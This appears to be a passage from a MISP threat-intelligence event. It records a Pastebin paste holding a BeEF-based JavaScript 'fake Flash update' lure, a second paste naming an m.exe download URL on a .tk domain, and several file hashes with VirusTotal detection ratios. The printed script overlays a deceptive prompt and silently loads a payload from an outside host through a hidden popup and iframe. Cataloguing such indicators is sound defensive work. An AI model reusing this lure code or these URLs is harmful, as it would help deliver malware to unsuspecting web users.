"value": "//\r\n// Copyright (c) 2006-2018 Wade Alcorn - wade@bindshell.net\r\n// Browser Exploitation Framework (BeEF) - http://beefproject.com\r\n// See the file 'doc/COPYING' for copying permission\r\n//\r\n\r\n // Module Configurations\r\nvar image = \"http://d20blzxlz9ydha.cloudfront.net/flash.png\";\r\nvar payload_type = \"Custom_Payload\";\r\nvar payload_uri = \"http://update.pythonanywhere.com/d\";\r\n\r\n//var beef_root = beef.net.httpproto + \"://\" + beef.net.host + \":\" + beef.net.port;\r\nvar payload = \"\";\r\n\r\n// Function to gray out the screen\r\nvar grayOut = function(vis, options) {\r\nvar options = options || {};\r\nvar zindex = options.zindex || 50;\r\nvar opacity = options.opacity || 70;\r\nvar opaque = (opacity / 100);\r\nvar bgcolor = options.bgcolor || '#000000';\r\nvar dark=document.getElementById('darkenScreenObject');\r\nif (!dark) {\r\n var tbody = document.getElementsByTagName(\"body\")[0];\r\n var tnode = document.createElement('div');\r\n tnode.style.position='absolute';\r\n tnode.style.top='0px';\r\n tnode.style.left='0px';\r\n tnode.style.overflow='hidden';\r\n tnode.style.display='none';\r\n tnode.id='darkenScreenObject';\r\n tbody.appendChild(tnode);\r\n dark=document.getElementById('darkenScreenObject');\r\n}\r\nif (vis) {\r\n var pageWidth='100%';\r\n var pageHeight='100%';\r\n dark.style.opacity=opaque;\r\n dark.style.MozOpacity=opaque;\r\n dark.style.filter='alpha(opacity='+opacity+')';\r\n dark.style.zIndex=zindex;\r\n dark.style.backgroundColor=bgcolor;\r\n dark.style.width= pageWidth;\r\n dark.style.height= pageHeight;\r\n dark.style.display='block';\r\n} else {\r\n dark.style.display='none';\r\n}\r\n};\r\n\r\n\r\n// Payload Configuration\r\nswitch (payload_type) {\r\n\tcase \"Custom_Payload\":\r\n\t payload = payload_uri;\r\n\tbreak;\r\n\tcase \"Firefox_Extension\":\r\n\t //payload = beef_root + \"/api/ipec/ff_extension\";\r\n\t break;\r\n\tdefault:\r\n\t //beef.net.send('<%= @command_url %>', <%= @command_id %>, 'error=payload not selected');\r\n\t break;\r\n}\r\n\r\n// Create DIV\r\nvar flashdiv = document.createElement('div');\r\nflashdiv.setAttribute('id', 'flashDiv');\r\nflashdiv.setAttribute('style', 'position:absolute; top:20%; left:30%; z-index:51;');\r\nflashdiv.setAttribute('align', 'center');\r\nvar id = setInterval(frame, 100);\r\nfunction frame() {\r\n\tif (document.body.appendChild(flashdiv)) {\r\n\t\t// window.open is very useful when using data URI vectors and the IFrame/Object tag\r\n\t\t// also, as the user is clicking on the link, the new tab opener is not blocked by the browser.\r\n\t\tflashdiv.innerHTML = \"<a href=\\\"\" + payload + \"\\\" target=\\\"_blank\\\" ><img src=\\\"\" + image + \"\\\" /></a>\";\r\n\r\n\t\t// gray out the background\r\n\t\tgrayOut(true,{'opacity':'30'});\r\n\r\n\t\t// clean up on click\r\n\t\tdocument.getElementById(\"flashDiv\").onclick = function(){\r\n\t\t\tdocument.body.removeChild(flashdiv);\r\n\t\t\tgrayOut(false,{'opacity':'0'});\r\n\t\t\tdocument.body.removeChild(document.getElementById('darkenScreenObject'));\r\n\t\t\taa=window.open(\"http://dzebppteh32lz.cloudfront.net/c\",'popUpWindow','height=1,width=1,top=0,left=0,resizable=no,scrollbars=no,toolbar=no,menubar=no,location=no,directories=no,status=no')\r\n\t\t\t//aa=window.openwindow.open(\"http://d3lvemwrafj7a7.cloudfront.net/e\",'_blank', 'toolbar=no,status=no,menubar=no,scrollbars=no,resizable=no,left=10000, top=10000, width=10, height=10', ''); \r\n\t\t\taa.moveTo(10000,10000);\r\n\t\t\t//window.open(\"http://update.pythonanywhere.com/d\");\r\n\t\t\tvar iframe = document.createElement('iframe');\r\n\t\t\tiframe.style.display = \"none\";\r\n\t\t\tiframe.src = \"http://update.pythonanywhere.com/d\";\r\n\t\t\tdocument.body.appendChild(iframe);\r\n\t\t\t\r\n\t\t}\r\n\t clearInterval(id);\r\n\t} \r\n}"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "username",
|
|
"timestamp": "1537332852",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "5ba1d674-5500-4354-b426-4bad950d210f",
|
|
"value": "wfkfly"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "origin",
|
|
"timestamp": "1537332852",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "5ba1d674-e264-47fd-a089-449e950d210f",
|
|
"value": "pastebin.com"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "url",
|
|
"timestamp": "1537332852",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5ba1d674-f124-48c8-95ff-4bb8950d210f",
|
|
"value": "https://pastebin.com/raw/AbhwC1Ki"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "Paste or similar post from a website allowing to share privately or publicly posts.",
|
|
"meta-category": "misc",
|
|
"name": "paste",
|
|
"template_uuid": "cedc055c-78aa-49a4-bfd7-4cc30cecef12",
|
|
"template_version": "4",
|
|
"timestamp": "1537332942",
|
|
"uuid": "5ba1d6ce-de54-4d15-8134-27c3950d210f",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "paste",
|
|
"timestamp": "1537332942",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "5ba1d6ce-d1e4-4362-a7ac-27c3950d210f",
|
|
"value": "https://daknobcq4zal6vbm.tk/m.exe;"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "username",
|
|
"timestamp": "1537332943",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "5ba1d6cf-498c-4df8-b61f-27c3950d210f",
|
|
"value": "wfkfly"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "origin",
|
|
"timestamp": "1537332943",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "5ba1d6cf-7928-4e3e-9e52-27c3950d210f",
|
|
"value": "pastebin.com"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "url",
|
|
"timestamp": "1537332943",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "5ba1d6cf-6ac4-4e0e-a8e7-27c3950d210f",
|
|
"value": "https://pastebin.com/R5q9wvHw"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "11",
|
|
"timestamp": "1537334462",
|
|
"uuid": "9fb96957-5ea7-449a-bbd2-ff71922b5a6e",
|
|
"ObjectReference": [
|
|
{
|
|
"comment": "",
|
|
"object_uuid": "9fb96957-5ea7-449a-bbd2-ff71922b5a6e",
|
|
"referenced_uuid": "7c26518e-fa7a-453f-a4cd-e234d2520d3e",
|
|
"relationship_type": "analysed-with",
|
|
"timestamp": "1537334494",
|
|
"uuid": "5ba1dcde-8d08-47a7-a596-4bfb02de0b81"
|
|
}
|
|
],
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1537334459",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "2dfc435d-b4df-4555-a431-9b756457575d",
|
|
"value": "33357485c5c92f087bd53602d6d8a48b"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha1",
|
|
"timestamp": "1537334460",
|
|
"to_ids": true,
|
|
"type": "sha1",
|
|
"uuid": "04f77f08-d1ab-442e-bd14-ed4935e7e9fa",
|
|
"value": "7403a54aa5ff712a8614e6a90398322d5fa7ba89"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha256",
|
|
"timestamp": "1537334460",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "25172f79-b5d8-4ba0-8f65-157f7a90fce8",
|
|
"value": "5b790f02bdb26b6b6b270a5669311b4f231d17872aafb237b7e87b6bbb57426d"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "VirusTotal report",
|
|
"meta-category": "misc",
|
|
"name": "virustotal-report",
|
|
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
|
|
"template_version": "2",
|
|
"timestamp": "1537334461",
|
|
"uuid": "7c26518e-fa7a-453f-a4cd-e234d2520d3e",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "last-submission",
|
|
"timestamp": "1537334461",
|
|
"to_ids": false,
|
|
"type": "datetime",
|
|
"uuid": "cbf68cfc-a53a-4a67-b043-d514ef6c251a",
|
|
"value": "2018-09-18T19:28:42"
|
|
},
|
|
{
|
|
"category": "External analysis",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "permalink",
|
|
"timestamp": "1537334461",
|
|
"to_ids": false,
|
|
"type": "link",
|
|
"uuid": "d17c47a6-5c9e-4b65-97a1-ecd5dd083c82",
|
|
"value": "https://www.virustotal.com/file/5b790f02bdb26b6b6b270a5669311b4f231d17872aafb237b7e87b6bbb57426d/analysis/1537298922/"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "detection-ratio",
|
|
"timestamp": "1537334462",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "6f915503-6a42-4a44-8ba4-a563bb038e7d",
|
|
"value": "9/53"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "11",
|
|
"timestamp": "1537334465",
|
|
"uuid": "d33ee6ee-437e-4ce5-ab11-837fee0edc8c",
|
|
"ObjectReference": [
|
|
{
|
|
"comment": "",
|
|
"object_uuid": "d33ee6ee-437e-4ce5-ab11-837fee0edc8c",
|
|
"referenced_uuid": "6836f38c-a2eb-4f7c-9055-2ffb96e7c45e",
|
|
"relationship_type": "analysed-with",
|
|
"timestamp": "1537334494",
|
|
"uuid": "5ba1dcde-a0e8-4072-ba50-44f202de0b81"
|
|
}
|
|
],
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1537334462",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "8de70b34-70b1-43f2-b3f7-fed0a57ab773",
|
|
"value": "1de7ceb3434243aa94296393165f89e7"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha1",
|
|
"timestamp": "1537334462",
|
|
"to_ids": true,
|
|
"type": "sha1",
|
|
"uuid": "5db4126d-0436-41b2-96a9-525e9924f1db",
|
|
"value": "67a12afbe6751418141284716235a6b27c17443a"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha256",
|
|
"timestamp": "1537334462",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "a64377f4-b5b5-4ecf-b760-4970341efe1a",
|
|
"value": "725efd0f5310763bc5375e7b72dbb2e883ad90ec32d6177c578a1c04c1b62054"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "VirusTotal report",
|
|
"meta-category": "misc",
|
|
"name": "virustotal-report",
|
|
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
|
|
"template_version": "2",
|
|
"timestamp": "1537334463",
|
|
"uuid": "6836f38c-a2eb-4f7c-9055-2ffb96e7c45e",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "last-submission",
|
|
"timestamp": "1537334463",
|
|
"to_ids": false,
|
|
"type": "datetime",
|
|
"uuid": "a7862599-832b-4ba2-ab1c-b1a320c1a4ad",
|
|
"value": "2018-09-19T03:31:22"
|
|
},
|
|
{
|
|
"category": "External analysis",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "permalink",
|
|
"timestamp": "1537334463",
|
|
"to_ids": false,
|
|
"type": "link",
|
|
"uuid": "abcf84f8-0717-443f-b190-4c623df3933d",
|
|
"value": "https://www.virustotal.com/file/725efd0f5310763bc5375e7b72dbb2e883ad90ec32d6177c578a1c04c1b62054/analysis/1537327882/"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "detection-ratio",
|
|
"timestamp": "1537334464",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "c306e374-13a0-4f9e-956c-e55fe50a8c97",
|
|
"value": "26/58"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "11",
|
|
"timestamp": "1537334467",
|
|
"uuid": "edd4b990-82be-4e5e-858f-50bbd7222f03",
|
|
"ObjectReference": [
|
|
{
|
|
"comment": "",
|
|
"object_uuid": "edd4b990-82be-4e5e-858f-50bbd7222f03",
|
|
"referenced_uuid": "54646fe4-9b9d-470a-9042-d446a90a15a5",
|
|
"relationship_type": "analysed-with",
|
|
"timestamp": "1537334494",
|
|
"uuid": "5ba1dcde-f6d4-4fea-9dcb-421402de0b81"
|
|
}
|
|
],
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1537334464",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "0de582fd-db8e-43c5-abb2-93b0214dcc6f",
|
|
"value": "f8c7e23c71478aa99dc3627da989b2ca"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha1",
|
|
"timestamp": "1537334464",
|
|
"to_ids": true,
|
|
"type": "sha1",
|
|
"uuid": "f017cfec-9858-4d88-b9e0-ff9a6383f57e",
|
|
"value": "e41d26b124c21b2c82b77194ed6be6ee8281410a"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha256",
|
|
"timestamp": "1537334465",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "bbb8d985-2be4-4fa1-8524-8acb92ab0616",
|
|
"value": "dbc380cbfb1536dfb24ef460ce18bccdae549b4585ba713b5228c23924385e54"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "VirusTotal report",
|
|
"meta-category": "misc",
|
|
"name": "virustotal-report",
|
|
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
|
|
"template_version": "2",
|
|
"timestamp": "1537334465",
|
|
"uuid": "54646fe4-9b9d-470a-9042-d446a90a15a5",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "last-submission",
|
|
"timestamp": "1537334465",
|
|
"to_ids": false,
|
|
"type": "datetime",
|
|
"uuid": "f8ac3222-2b8a-49c6-b107-f22538e9f3f9",
|
|
"value": "2018-09-18T20:07:10"
|
|
},
|
|
{
|
|
"category": "External analysis",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "permalink",
|
|
"timestamp": "1537334466",
|
|
"to_ids": false,
|
|
"type": "link",
|
|
"uuid": "193bbd5f-b6bd-43bc-b1f7-f75586c795ad",
|
|
"value": "https://www.virustotal.com/file/dbc380cbfb1536dfb24ef460ce18bccdae549b4585ba713b5228c23924385e54/analysis/1537301230/"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "detection-ratio",
|
|
"timestamp": "1537334466",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "2240f3fb-744f-48a4-8918-f9c428c4d465",
|
|
"value": "10/58"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "11",
|
|
"timestamp": "1537334469",
|
|
"uuid": "33e723b8-2142-46a4-8eae-c311211ea8a0",
|
|
"ObjectReference": [
|
|
{
|
|
"comment": "",
|
|
"object_uuid": "33e723b8-2142-46a4-8eae-c311211ea8a0",
|
|
"referenced_uuid": "87558dd2-f70c-49b7-b710-6666909e0e91",
|
|
"relationship_type": "analysed-with",
|
|
"timestamp": "1537334495",
|
|
"uuid": "5ba1dcdf-6b5c-447b-b617-489c02de0b81"
|
|
}
|
|
],
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1537334466",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "df8f7068-ffca-4885-bac9-8c007b52827d",
|
|
"value": "9d080aa27da74e146a45b56c86476f20"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha1",
|
|
"timestamp": "1537334467",
|
|
"to_ids": true,
|
|
"type": "sha1",
|
|
"uuid": "ca26330b-73f7-4055-9840-8c65b17290d3",
|
|
"value": "115bda02fd2807bd0e9645656c378bf1b145b4b8"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha256",
|
|
"timestamp": "1537334467",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "47a1b89f-0b1b-486d-8121-6e17019f64de",
|
|
"value": "dcd37e5b266cc0cd3fab73caa63b218f5b92e9bd5b25cf1cacf1afdb0d8e76ff"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "VirusTotal report",
|
|
"meta-category": "misc",
|
|
"name": "virustotal-report",
|
|
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
|
|
"template_version": "2",
|
|
"timestamp": "1537334468",
|
|
"uuid": "87558dd2-f70c-49b7-b710-6666909e0e91",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "last-submission",
|
|
"timestamp": "1537334468",
|
|
"to_ids": false,
|
|
"type": "datetime",
|
|
"uuid": "3d949d3f-cbed-49eb-b6d4-76efa21d3605",
|
|
"value": "2018-09-18T11:41:09"
|
|
},
|
|
{
|
|
"category": "External analysis",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "permalink",
|
|
"timestamp": "1537334468",
|
|
"to_ids": false,
|
|
"type": "link",
|
|
"uuid": "120a5e8e-d241-45d1-a52a-b20a69c69c21",
|
|
"value": "https://www.virustotal.com/file/dcd37e5b266cc0cd3fab73caa63b218f5b92e9bd5b25cf1cacf1afdb0d8e76ff/analysis/1537270869/"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "detection-ratio",
|
|
"timestamp": "1537334469",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "6522271c-6206-43b8-bed9-2ee6b928da31",
|
|
"value": "21/58"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "11",
|
|
"timestamp": "1537334472",
|
|
"uuid": "d88b602b-394b-4c46-92fd-b776ed9ef8d9",
|
|
"ObjectReference": [
|
|
{
|
|
"comment": "",
|
|
"object_uuid": "d88b602b-394b-4c46-92fd-b776ed9ef8d9",
|
|
"referenced_uuid": "3df3df12-3458-48cc-9031-686fefeaf564",
|
|
"relationship_type": "analysed-with",
|
|
"timestamp": "1537334495",
|
|
"uuid": "5ba1dcdf-8064-4ae5-912f-446a02de0b81"
|
|
}
|
|
],
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1537334469",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "de4b1ff0-8efa-46f4-b618-be604c2eeedc",
|
|
"value": "2d39b1792b263eba084e10c54e053d84"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha1",
|
|
"timestamp": "1537334469",
|
|
"to_ids": true,
|
|
"type": "sha1",
|
|
"uuid": "83e0e2db-e2ee-46f6-bb21-a2494c055af2",
|
|
"value": "1468eac59bd43901de82389276bded18202f799f"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha256",
|
|
"timestamp": "1537334469",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "73f9847b-1485-4c7d-ad01-12b9003b1e97",
|
|
"value": "f808a42b10cf55603389945a549ce45edc6a04562196d14f7489af04688f12bc"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "VirusTotal report",
|
|
"meta-category": "misc",
|
|
"name": "virustotal-report",
|
|
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
|
|
"template_version": "2",
|
|
"timestamp": "1537334470",
|
|
"uuid": "3df3df12-3458-48cc-9031-686fefeaf564",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "last-submission",
|
|
"timestamp": "1537334470",
|
|
"to_ids": false,
|
|
"type": "datetime",
|
|
"uuid": "9c2f0268-084d-401f-a118-859baa7da926",
|
|
"value": "2018-09-18T18:34:30"
|
|
},
|
|
{
|
|
"category": "External analysis",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "permalink",
|
|
"timestamp": "1537334470",
|
|
"to_ids": false,
|
|
"type": "link",
|
|
"uuid": "92b34d76-149f-4fab-a1c0-3d1fab052d39",
|
|
"value": "https://www.virustotal.com/file/f808a42b10cf55603389945a549ce45edc6a04562196d14f7489af04688f12bc/analysis/1537295670/"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "detection-ratio",
|
|
"timestamp": "1537334471",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "7c1e81fd-a762-4c8c-910f-e10d7da374bd",
|
|
"value": "15/58"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "11",
|
|
"timestamp": "1537334474",
|
|
"uuid": "93747f03-1eec-47e4-82bc-29b8356a4961",
|
|
"ObjectReference": [
|
|
{
|
|
"comment": "",
|
|
"object_uuid": "93747f03-1eec-47e4-82bc-29b8356a4961",
|
|
"referenced_uuid": "59d3e161-919f-486a-bb7b-f4010360c91c",
|
|
"relationship_type": "analysed-with",
|
|
"timestamp": "1537334495",
|
|
"uuid": "5ba1dcdf-2b20-43ad-bd13-4bfb02de0b81"
|
|
}
|
|
],
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1537334471",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "1fc95f86-1389-4c09-b65f-fca093d04a4e",
|
|
"value": "7b5008d312465307905d96b4b8366326"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha1",
|
|
"timestamp": "1537334471",
|
|
"to_ids": true,
|
|
"type": "sha1",
|
|
"uuid": "e26b042f-7e21-411e-b30e-7412ae4f3f6d",
|
|
"value": "a0a5d9fc4ce11f9069a64229cef52ba707027546"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha256",
|
|
"timestamp": "1537334472",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "7531c1a3-4476-4afe-b6b0-3de9bad07f28",
|
|
"value": "0b9c54692d25f68ede1de47d4206ec3cd2e5836e368794eccb3daa632334c641"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "VirusTotal report",
|
|
"meta-category": "misc",
|
|
"name": "virustotal-report",
|
|
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
|
|
"template_version": "2",
|
|
"timestamp": "1537334472",
|
|
"uuid": "59d3e161-919f-486a-bb7b-f4010360c91c",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "last-submission",
|
|
"timestamp": "1537334472",
|
|
"to_ids": false,
|
|
"type": "datetime",
|
|
"uuid": "344f34ab-206c-4ca6-857f-f038049eeca8",
|
|
"value": "2018-09-19T05:11:59"
|
|
},
|
|
{
|
|
"category": "External analysis",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "permalink",
|
|
"timestamp": "1537334473",
|
|
"to_ids": false,
|
|
"type": "link",
|
|
"uuid": "b42f45b5-2c58-4b38-a615-c6c66fd48dcb",
|
|
"value": "https://www.virustotal.com/file/0b9c54692d25f68ede1de47d4206ec3cd2e5836e368794eccb3daa632334c641/analysis/1537333919/"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "detection-ratio",
|
|
"timestamp": "1537334473",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "647a2027-5c6b-4ee2-a934-fe17edc10ae7",
|
|
"value": "10/58"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "11",
|
|
"timestamp": "1537334476",
|
|
"uuid": "a1f90b96-d2ce-46d4-a059-5efedbb57e07",
|
|
"ObjectReference": [
|
|
{
|
|
"comment": "",
|
|
"object_uuid": "a1f90b96-d2ce-46d4-a059-5efedbb57e07",
|
|
"referenced_uuid": "7b042050-b92e-404c-87e8-107c8986e1d7",
|
|
"relationship_type": "analysed-with",
|
|
"timestamp": "1537334495",
|
|
"uuid": "5ba1dcdf-1b58-4bee-bdfe-4cb202de0b81"
|
|
}
|
|
],
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1537334473",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "003bead2-ae33-4055-955d-7b48b37dda5a",
|
|
"value": "e158c98a90cc7b14d026443cbcd8b520"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
